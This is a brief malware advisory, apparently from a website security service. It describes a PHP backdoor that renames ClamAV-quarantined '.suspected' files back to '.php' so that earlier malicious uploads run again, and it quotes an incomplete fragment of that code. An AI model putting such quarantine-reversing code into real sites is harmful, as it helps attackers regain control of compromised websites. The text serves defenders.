A backdoor that renames quarantined files by ClamAV with extension .suspected back to .php in order to re-enable the previous maliciously uploaded files, or if any left by previous attack. It's used by the attacker to try to gain control back to an infected website where he has uploaded malicious files before.
This malicious code affects any vulnerable or compromised website that is configured to interpret the script language.
Inspect your site's files, specially theme related, to find for code you don't recognize. Look for any encoded or obfuscated PHP code.
Also, you can sign up with us and let our team remove the malware for you.
$dir = scandir("..");
foreach ($dir as $dirr)
if (strpos($dirr, ".suspected"))
$newdirr = str_replace(".suspected", "", $dirr);